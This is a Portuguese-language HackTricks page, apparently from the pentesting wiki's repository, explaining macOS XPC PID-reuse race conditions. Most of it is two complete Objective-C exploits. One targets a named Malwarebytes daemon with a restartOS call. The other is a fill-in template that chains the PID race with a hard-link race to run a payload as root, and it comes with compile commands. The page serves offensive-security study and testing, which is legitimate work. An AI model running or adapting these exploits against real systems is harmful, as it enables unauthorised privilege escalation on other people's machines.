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302 lines
12 KiB
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302 lines
12 KiB
Markdown
# Reutilização de PID no macOS
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<details>
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<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
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* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
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* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
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* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
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* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
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</details>
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## Reutilização de PID
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Quando um serviço **XPC** do macOS verifica o processo chamado com base no **PID** e não no **token de auditoria**, ele está vulnerável a um ataque de reutilização de PID. Esse ataque é baseado em uma **condição de corrida** em que um **exploit** vai **enviar mensagens para o serviço XPC** abusando da funcionalidade e, **logo após**, executar **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** com o binário **permitido**.
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Essa função fará com que o **binário permitido possua o PID**, mas a **mensagem XPC maliciosa terá sido enviada** logo antes. Portanto, se o serviço **XPC** usar o **PID** para **autenticar** o remetente e verificar isso **APÓS** a execução do **`posix_spawn`**, ele pensará que vem de um processo **autorizado**.
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### Exemplo de exploit
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Se você encontrar a função **`shouldAcceptNewConnection`** ou uma função chamada por ela que **chame** **`processIdentifier`** e não chame **`auditToken`**, é altamente provável que esteja verificando o PID do processo e não o token de auditoria.\
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Como por exemplo nesta imagem (retirada da referência):
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<figure><img src="../../../../.gitbook/assets/image (4) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
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Verifique este exemplo de exploit (novamente, retirado da referência) para ver as 2 partes do exploit:
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* Uma que **gera vários forks**
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* **Cada fork** irá **enviar** a **carga útil** para o serviço XPC enquanto executa **`posix_spawn`** logo após o envio da mensagem.
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{% hint style="danger" %}
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Para que o exploit funcione, é importante exportar **`OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`** ou colocar no exploit:
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```objectivec
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asm(".section __DATA,__objc_fork_ok\n"
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"empty:\n"
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".no_dead_strip empty\n");
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```
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{% endhint %}
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{% tabs %}
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{% tab title="NSTasks" %}
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Primeira opção usando **`NSTasks`** e argumento para lançar os processos filhos para explorar o RC
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```objectivec
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// from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
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// gcc -framework Foundation expl.m -o expl
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#import <Foundation/Foundation.h>
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#include <spawn.h>
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#include <sys/stat.h>
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#define RACE_COUNT 32
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#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
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#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"
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// allow fork() between exec()
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asm(".section __DATA,__objc_fork_ok\n"
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"empty:\n"
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".no_dead_strip empty\n");
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extern char **environ;
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// defining necessary protocols
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@protocol ProtectionService
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- (void)startDatabaseUpdate;
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- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
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- (void)uninstallProduct;
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- (void)installProductUpdate;
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- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
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- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
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- (void)triggerLicenseRelatedChecks;
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- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
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- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
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- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
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- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
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- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
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- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
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- (void)restartOS;
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- (void)resumeScanJob;
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- (void)pauseScanJob;
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- (void)stopScanJob;
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- (void)startScanJob;
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- (void)disposeOperationBy:(NSUUID *)arg1;
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- (void)subscribeTo:(long long)arg1;
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- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
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@end
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void child() {
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// send the XPC messages
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NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
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NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
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xpcConnection.remoteObjectInterface = remoteInterface;
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[xpcConnection resume];
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[xpcConnection.remoteObjectProxy restartOS];
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char target_binary[] = BINARY;
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char *target_argv[] = {target_binary, NULL};
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posix_spawnattr_t attr;
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posix_spawnattr_init(&attr);
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short flags;
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posix_spawnattr_getflags(&attr, &flags);
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flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
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posix_spawnattr_setflags(&attr, flags);
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posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
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}
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bool create_nstasks() {
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NSString *exec = [[NSBundle mainBundle] executablePath];
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NSTask *processes[RACE_COUNT];
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for (int i = 0; i < RACE_COUNT; i++) {
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processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
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}
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int i = 0;
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struct timespec ts = {
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.tv_sec = 0,
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.tv_nsec = 500 * 1000000,
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};
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nanosleep(&ts, NULL);
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if (++i > 4) {
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for (int i = 0; i < RACE_COUNT; i++) {
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[processes[i] terminate];
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}
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return false;
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}
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return true;
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}
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int main(int argc, const char * argv[]) {
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if(argc > 1) {
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// called from the NSTasks
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child();
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} else {
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NSLog(@"Starting the race");
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create_nstasks();
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}
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return 0;
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}
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```
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{% tab title="fork" %}
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Este exemplo usa um **`fork`** bruto para lançar **filhos que irão explorar a condição de corrida do PID** e, em seguida, explorar **outra condição de corrida através de um Hard link:**
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```objectivec
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// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
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// gcc -framework Foundation expl.m -o expl
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#include <Foundation/Foundation.h>
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#include <spawn.h>
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#include <pthread.h>
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// TODO: CHANGE PROTOCOL AND FUNCTIONS
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@protocol HelperProtocol
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- (void)DoSomething:(void (^)(_Bool))arg1;
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@end
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// Global flag to track exploitation status
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bool pwned = false;
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/**
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* Continuously overwrite the contents of the 'hard_link' file in a race condition to make the
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* XPC service verify the legit binary and then execute as root out payload.
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*/
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void *check_race(void *arg) {
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while(!pwned) {
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// Overwrite with contents of the legit binary
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system("cat ./legit_bin > hard_link");
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usleep(50000);
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// Overwrite with contents of the payload to execute
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// TODO: COMPILE YOUR OWN PAYLOAD BIN
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system("cat ./payload > hard_link");
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usleep(50000);
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}
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return NULL;
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}
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void child_xpc_pid_rc_abuse(){
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// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION
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#define kValid "./Legit Updater.app/Contents/MacOS/Legit"
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extern char **environ;
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// Connect with XPC service
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// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT
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NSString* service_name = @"com.example.Helper";
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NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
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// TODO: CNAGE THE PROTOCOL NAME
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NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
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[connection setRemoteObjectInterface:interface];
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[connection resume];
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id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {
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NSLog(@"[-] Something went wrong");
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NSLog(@"[-] Error: %@", error);
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}];
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NSLog(@"obj: %@", obj);
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NSLog(@"conn: %@", connection);
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// Call vulenrable XPC function
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// TODO: CHANEG NAME OF FUNCTION TO CALL
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[obj DoSomething:^(_Bool b){
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NSLog(@"Response, %hdd", b);
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}];
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// Change current process to the legit binary suspended
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char target_binary[] = kValid;
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char *target_argv[] = {target_binary, NULL};
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posix_spawnattr_t attr;
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posix_spawnattr_init(&attr);
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short flags;
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posix_spawnattr_getflags(&attr, &flags);
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flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
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posix_spawnattr_setflags(&attr, flags);
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posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
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}
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/**
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* Function to perform the PID race condition using children calling the XPC exploit.
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*/
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void xpc_pid_rc_abuse() {
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#define RACE_COUNT 1
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extern char **environ;
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int pids[RACE_COUNT];
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// Fork child processes to exploit
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for (int i = 0; i < RACE_COUNT; i++) {
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int pid = fork();
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if (pid == 0) { // If a child process
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child_xpc_pid_rc_abuse();
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}
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printf("forked %d\n", pid);
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pids[i] = pid;
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}
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// Wait for children to finish their tasks
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sleep(3);
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// Terminate child processes
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for (int i = 0; i < RACE_COUNT; i++) {
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if (pids[i]) {
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kill(pids[i], 9);
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}
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}
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}
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int main(int argc, const char * argv[]) {
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// Create and set execution rights to 'hard_link' file
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system("touch hard_link");
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system("chmod +x hard_link");
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// Create thread to exploit sign verification RC
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pthread_t thread;
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pthread_create(&thread, NULL, check_race, NULL);
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while(!pwned) {
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// Try creating 'download' directory, ignore errors
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system("mkdir download 2>/dev/null");
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// Create a hardlink
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// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC
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system("ln hard_link download/legit_bin");
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xpc_pid_rc_abuse();
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usleep(10000);
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// The payload will generate this file if exploitation is successfull
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if (access("/tmp/pwned", F_OK ) == 0) {
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pwned = true;
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}
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}
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return 0;
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}
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```
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{% endtab %}
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{% endtabs %}
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## Referências
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* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)
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* [https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf](https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf)
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<details>
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<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
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* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
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* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
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* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
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* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
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* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
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</details>
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